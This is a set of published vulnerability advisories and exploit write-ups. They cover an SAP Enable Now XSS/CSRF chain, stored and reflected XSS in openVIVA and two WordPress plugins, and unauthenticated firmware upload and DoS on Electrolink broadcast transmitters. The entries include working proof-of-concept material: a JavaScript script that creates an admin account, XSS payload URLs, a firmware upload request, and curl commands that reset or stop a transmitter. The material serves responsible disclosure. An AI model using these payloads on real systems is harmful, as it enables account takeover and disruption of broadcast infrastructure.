<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230927-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities<br /> product: SAP® Enable Now Manager<br /> vulnerable version: 10.6.5 (Build 2804) Cloud Edition<br /> fixed version: May 2023 Release<br /> CVE number: N/A (cloud)<br /> impact: high<br /> homepage: https://www.sap.com/about.html<br /> found: 2022-10-21<br /> by: Paul Serban (Eviden)<br /> Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP Enable Now solution provides advanced in-application help and<br />training capabilities helping you to improve productivity and user<br />adoption, as well as to increase satisfaction of the end-user experience.<br />Create, maintain, and deliver in-application help, learning materials,<br />and documentation content easily."<br /><br />Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now<br /><br /><br />Business recommendation:<br />------------------------<br />Due to the Cloud Edition being affected, the vendor automatically pushed<br />a fix in the production environment in the May 2023 Release.<br /><br />SEC Consult recommends to perform a thorough security review conducted by<br />security professionals to identify and resolve potential further critical<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Multiple vulnerabilities were identified that could be chained together in<br />order to allow a remote, unauthenticated attacker to create new administrative<br />user accounts by tricking the victim to click on a malicious link or visit<br />a malicious website prepared by the attacker.<br /><br /><br />1) Open Redirect/URL Redirection Vulnerability<br />The file download feature of the application contains an unvalidated<br />parameter value that exposes it to an open redirect vulnerability. An<br />attacker can create a malicious URL which would redirect the victim to<br />a malicious site, for example, a phishing site convincing the victim<br />to login once again.<br /><br />2) Reflected Cross Site Scripting (XSS)<br />A reflected XSS vulnerability was found affecting the same parameter as<br />used in 1). Due to insufficient input validation and output encoding, an<br />attacker can inject arbitrary HTML or JavaScript code into the generated<br />server response, executing it in the browser of the victim. The vulnerability,<br />can be exploited, for example, to create new administrative user accounts<br />in the application, thereby fully compromising the application. Any CSRF<br />protection can be bypassed by means of this vulnerability.<br /><br />3) Insufficient Cross-Site Request Forgery (CSRF) Protection<br />No implementation of CSRF protection was detected in the application.<br />Using this vulnerability, an attacker can issue requests in the context<br />of administrative user sessions. This includes critical state changing<br />actions such as user creation or role assignment. Note that in the<br />test environment the option 'Supported Functions' was set to value<br />'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.<br /><br />Certain configurations require this setting to be enabled, e.g. to allow<br />the SEN Workflow Approver extension to submit the data on behalf of the<br />logged-in user to the SAP Enable Now Manager. Without this parameter,<br />the extension will only be able to read the content and workflow information)<br /><br />This indicates that there is an insecure feature which allows the protection<br />mechanism to be disabled globally. It could not be clarified if this is the<br />default setting. In any case, the function should still be enhanced to protect<br />critical actions such as functions used in user management or role/permission<br />management even if the mechanism is disabled by configuration.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Open Redirect/URL Redirection Vulnerability<br />The public endpoint /resources/open_file.html is vulnerable to an<br />open redirect via GET parameter 'info'. To verify this vulnerability,<br />it is sufficient to open the following URL in a web browser.<br /><br />https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com<br /><br />After browsing to the above link, the victim gets redirected to<br />www.sec-consult.com in a new browser window opened by the embedded<br />call of function window.open(). Note that both attacker and victim<br />do not have to be authenticated for successful exploitation.<br /><br /><br />2) Reflected Cross-Site Scripting (XSS)<br />The public endpoint /resources/open_file.html is affected by an XSS<br />vulnerability in GET parameter 'info'. To verify this vulnerability,<br />it is sufficient to open the following URL in a web browser.<br /><br />https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)<br /><br />After browsing to the above link, the domain property returns the<br />domain name of the server it was loaded from an alert window within<br />the browser of the victim. This proves the successful execution of the<br />injected JavaScript code. In fact, any kind of JavaScript code could<br />be injected by the attacker. Note that both attacker and victim do<br />not have to be authenticated for successful exploitation.<br /><br /><br />3) Insufficient Cross-Site Request Forgery (CSRF) Protection<br />No CSRF protection can be observed in POST requests sent between the<br />client and server. This includes at least the functions "task creation",<br />"user creation", "permission assignment" and "role/group assignment". Note<br />that this vulnerability appears to only affect systems where the CSRF protection<br />is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'<br />in the server settings. Although this setting can be reverted, it is advised<br />to have the protection enabled for critical operations such as user creation<br />or permission assignment at any time (also when the option is set).<br /><br />Several of the vulnerabilities above can be chained together by an<br />unauthenticated attacker. Considering the types of vulnerabilities,<br />there are multiple exploitation scenarios. In our example we will<br />create a link that, when clicked by an administrator victim, will<br />create a new admin account. For this attack to work, we first need<br />to gather some information. To create an account, we need to know two<br />important values: the OU and the UID. The OU represents the Organizational<br />Unit unique identifier. The UID here represents the unique Group ID<br />of our target group where we want our new user to be added. Performing<br />a simple GET request to endpoint /self/group, both values can be<br />obtained. The following listing shows the server response.<br /><br />------------------------------------------------------------------------------------------------<br />HTTP/1.1 200<br />Cache-Control: no-cache, no-store, must-revalidate<br />Expires: 0<br />Vary: Origin<br />Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;<br />Content-Type: text/json;charset=UTF-8<br />Server: SAP<br />Connection: close<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />Content-Length: 396<br /><br />{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086",<br />"ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":<br />"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name<br />":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU<br />10C ","active":true}]}}<br />------------------------------------------------------------------------------------------------<br /><br /><br />Finally, in order for the attack to succeed, the attacker needs<br />the victim (logged in as administrator) to do first a request on<br />the above endpoint, then a POST request on the endpoint /!/user<br />to actually create the new user account with the administrator<br />role assigned using the values taken from the previous response.<br />These interactions can be scripted using the following ten lines<br />of JavaScript code.<br /><br />------------------------------------------------------------------------------------------------<br />var req1 = new XMLHttpRequest();<br />req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);<br />req1.withCredentials = true;<br />req1.send();<br />var obj = JSON.parse(req1.responseText).response;<br />for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};<br />var req2 = new XMLHttpRequest();<br />req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);<br />req2.withCredentials = true;<br />req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));<br />------------------------------------------------------------------------------------------------<br /><br />We can base64-encode this payload and pass it to the Javascript eval(atob())<br />function using the XSS vulnerability in the file download feature (seen in 2.).<br />The link could then be shortened to enhance the likelihood of successful<br />exploitation. This can be achieved, for example, by leveraging the Open Redirect<br />vulnerability (seen in 1.) to redirect the victim to an attacker-controlled<br />website and trigger the above payload, making it an attack more likely to<br />succeed. If the victim is logged into the application and is part of<br />the Administrator group, when they click on this link, a new admin<br />account will be instantly created. The attacker then can log in and has<br />full control over the application.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions of the software were found to be vulnerable during our tests:<br /><br />- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-08: Contacting vendor via secure@sap.com<br />2022-11-10: Vendor requested screenshots and steps to reproduce<br />2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce<br /> and screenshots weren't available at that time<br />2022-11-10: Vendor confirmed issues are under review<br />2022-11-18: Contacted vendor to request an update<br />2022-11-18: Vendor confirmed issues are still under review<br />2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to<br /> the Engineering Team<br />2023-02-02: Contacted vendor to request an update<br />2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a<br /> release schedule.<br />2023-02-07: Vendor confirmed fix was deployed to production for ticket no #2280196564<br />2023-04-14: Contacted vendor to request update on ticket no #2280196563 fix<br />2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release<br />2023-05-08: Vendor confirmed fix was deployed to production for 2280196563<br />2023-09-27: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Due to the Cloud Edition being affected, the vendor automatically pushed<br />a fix in the production environment in the May 2023 Release.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF P. Serban, F. Hagg / @2023<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230925-0 ><br />=======================================================================<br /> title: Stored Cross-Site Scripting<br /> product: mb Support broker management solution openVIVA c2<br /> vulnerable version: <20220801<br /> fixed version: =>20220801<br /> CVE number: CVE-2022-39172<br /> impact: Medium<br /> homepage: https://mbsupport.de<br /> found: 2022-03-16<br /> by: Daniel Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Support small and medium-sized companies as well as large corporate customers<br />with just one software. Sales , inventory management , billing , e-mail and<br />much more - with openVIVA c2 you get everything in one application. Without<br />system disruption and in one database, you can do all the work of an insurance<br />broker with one piece of software.<br /><br />Connect brokers, intermediaries, insurers and customers directly with our<br />self-service portals . Strengthen your customer relationships and work more<br />efficiently yourself.<br /><br />mb Support offers portals for intermediaries as well as industrial and<br />commercial customers and tailor-made portal solutions for insurers, brokers and<br />private customers."<br /><br />Source: https://mbsupport.de/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an updated version to their customers.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected from other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross-Site Scripting (CVE-2022-39172)<br />An authenticated attacker with privileges of the role 'user' can create a new<br />'Vorgang' (Process). The field 'Name' is not sanitized and enables an attacker<br />to perform a stored XSS attack. Additionally, the field 'Hauptverantwortlicher'<br />(persons mainly responsible) can be used to assign this 'Vorgang' to another user<br />who will receive it in his overview list. This results in a targeted stored<br />XSS attack.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross-Site Scripting (CVE-2022-39172)<br />The application is developed on top of Oracle Apex<br />(https://apex.oracle.com/en/) which provides several security features to<br />developers. Two of those are request replay protection and parameter<br />checksumming which make it hard to develop a PoC which only consists of<br />requests and responses. Therefore this PoC will be a textual description of the<br />required steps and supplemented with pictures. Additionally the library<br />'AlertifyJS' is used, which changes the appearance of alert popups which<br />can be confusing if you are used to the standard alert popups.<br /><br />To execute the attack the following steps have to be performed:<br />1. Log in to openVIVA c2<br />2. Go to 'mein openVIVA' (my openVIVA)<br />3. Click on 'Vorgangszuordnung' (Process Assignment)<br />4. Click on 'Neuen Vorgang starten' (Start new Process)<br />5. In the new form enter the XSS payload into the 'Name' field, for example<br /> "<script>alert('XSS')</script>"<br />6. Choose your victim as 'Hauptverantwortlicher' (persons mainly responsible)<br />7. Click on the three dots<br />8. Click on 'Speichern' (save)<br /><br />The victim now has a new 'Vorgang' in his inbox. If the 'Vorgänge' menu is clicked,<br />the victim is redirected to the list of assigned 'Vorgänge'. Because our payload<br />is in the name field it is executed as soon as the list of processes is loaded.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* openVIVA c2 20220101<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-03-30: Contacting vendor through email followed by a telephone call,<br /> sent the advisory<br />2022-04-20: Asking for status update<br />2022-04-22: Patch release is planned for August<br />2022-07-26: Statuscall: Patch exists, advisory release delayed until<br /> rollout to all customers is complete (~ August 2023(!))<br />2023-09-18: Asking for a status update and patch download information.<br /> Vendor response: no public link available; few customers<br /> still have no patch.<br />2023-09-25: Release of security advisory<br /><br /><br /><br />Solution:<br />---------<br />Upgrade to version 2022-08-01 or later. The vendor has no public<br />download link available as all customers will be patched according<br />to their maintenance contract.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult? Send us your application<br />https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger / @2023<br /><br /></code></pre>
<pre><code># Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting<br /># Date: 03-10-2023<br /># Exploit Author: Arvandy<br /># Software Link: https://wordpress.org/plugins/contact-form-generator/<br /># Vendor Homepage: https://www.creative-solutions.net/<br /># Version: 2.5.5 <br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-37988<br /><br /># Product Description<br />Contact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/<br /><br /># Vulnerability overview:<br />The Wordpress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.<br /><br /># Proof of Concept:<br />Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=<br />Affected Parameters: id<br />XSS Payload: "><script>alert(document.cookie)</script>x<br />http://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex<br /><br /># Recommendation<br />Upgrade to version 2.6.0<br /></code></pre>
<pre><code># Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting<br /># Date: 03-10-2023<br /># Exploit Author: Arvandy<br /># Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/<br /># Vendor Homepage: https://kivicare.io/<br /># Version: 3.2.0<br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-2624<br /><br /># Product Description<br />KiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/<br /><br /># Vulnerability overview:<br />The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.<br /><br /># Proof of Concept:<br /><br />Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=<br />Affected Parameters: filterType<br />XSS Payload: <img src=x onerror=alert(document.cookie)><br />http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E<br /><br /># Recommendation<br />Upgrade to version 3.2.1<br /><br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device allows access to an unprotected endpoint that<br />allows MPFS File System binary image upload without authentication.<br />The MPFS2 file system module provides a light-weight read-only<br />file system that can be stored in external EEPROM, external<br />serial Flash, or internal Flash program memory. This file system<br />serves as the basis for the HTTP2 web server module, but is also<br />used by the SNMP module and is available to other applications<br />that require basic read-only storage capabilities. This can be<br />exploited to overwrite the flash program memory that holds the<br />web server's main interfaces and execute arbitrary code.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5796<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php<br /><br />Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html<br /><br />30.06.2023<br /><br />--<br /><br /><br />POST /upload HTTP/1.1<br />Host: 192.168.150.77:8888<br />Content-Length: 251<br />Cache-Control: max-age=0<br />Content-Type: multipart/form-data; boundary=----joxypoxy<br />User-Agent: MPFS2_PoC/1.0c<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: Login=IgnoreMePlsKtnx<br />Connection: close<br /><br />------joxypoxy<br />Content-Disposition: form-data; name="i"; filename="MPFSimg.bin"<br />Content-Type: application/octet-stream<br /><br />MPFS...<CGI BINARY PHONE HOME><br />-----joxypoxy--<br /><br /><br />HTTP/1.1 200 OK<br />Connection: close<br />Content-Type: text/html<br /><br /><html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html><br /><br /><br />---<br /><br />hd htm:<br />0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C....<br />2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d....<br />00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht<br />6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL<<br />...<br />...<br />64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..-<br /><br />---<br /><br />MPFS Structure:<br /> [M][P][F][S]<br /> [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]<br /> [Name Hash 0][Name Hash 1]...[Name Hash N]<br /> [File Record 0][File Record 1]...[File Record N]<br /> [String 0][String 1]...[String N]<br /> [File Data 0][File Data 1]...[File Data N]<br /><br /><br />---<br /><br />C:\>javaw -jar MPFS2.jar<br />C:\>mpfs2 -v -l MPFSimg.bin<br />Version: 2.1<br />Number of files: 1 (1 regular, 0 index)<br />Number of dynamic variables: 0<br /><br />FileRecord 0:<br /> .StringPtr = 32 index0.htm<br /> .DataPtr = 43<br /> .Len = 48<br /> .Timestamp = 2023-08-27T14:39:30Z<br /> .Flags = 0<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The transmitter is suffering from a Denial of Service (DoS)<br />scenario. An unauthenticated attacker can reset the board as well<br />as stop the transmitter operations by sending one GET request to<br />the command.cgi gateway.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5795<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)<br />Success! OK<br />C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)<br />Success! OK<br />C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)<br />Success! OK<br /></code></pre>